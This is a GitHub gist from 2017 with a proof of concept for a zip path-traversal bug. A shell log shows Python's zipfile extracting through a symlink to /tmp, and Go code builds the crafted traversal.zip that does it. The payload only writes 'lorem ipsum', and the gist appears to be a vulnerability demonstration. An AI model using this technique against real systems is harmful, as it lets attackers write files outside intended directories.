~/current/zip_vulns ❯ ls -al /tmp/zip_attack123
ls: cannot access '/tmp/zip_attack123': No such file or directory
~/current/zip_vulns ❯ ln -s /tmp tmp_dir
~/current/zip_vulns ❯ python -m zipfile -l traversal.zip
File Name Modified Size
tmp_dir/zip_attack123 1980-00-00 00:00:00 11
~/current/zip_vulns ❯ python -m zipfile -e traversal.zip .
~/current/zip_vulns ❯ ls -al /tmp/zip_attack123
-rw-r--r-- 1 anon wheel 11 Jan 28 01:23 /tmp/zip_attack123
Created
January 28, 2017 00:24
-
-
Save ecneladis/55486478297c63f96f2b9e87c01f3ccb to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"archive/zip" | |
"os" | |
"log" | |
) | |
func main() { | |
f, err := os.Create("traversal.zip") | |
if err != nil { | |
log.Fatal(err) | |
} | |
w := zip.NewWriter(f) | |
var files = []struct { | |
Name, Body string | |
}{ | |
{"tmp_dir/zip_attack123", "lorem ipsum"}, | |
} | |
for _, file := range files { | |
f, err := w.Create(file.Name) | |
if err != nil { | |
log.Fatal(err) | |
} | |
_, err = f.Write([]byte(file.Body)) | |
if err != nil { | |
log.Fatal(err) | |
} | |
} | |
w.Close() | |
f.Close() | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment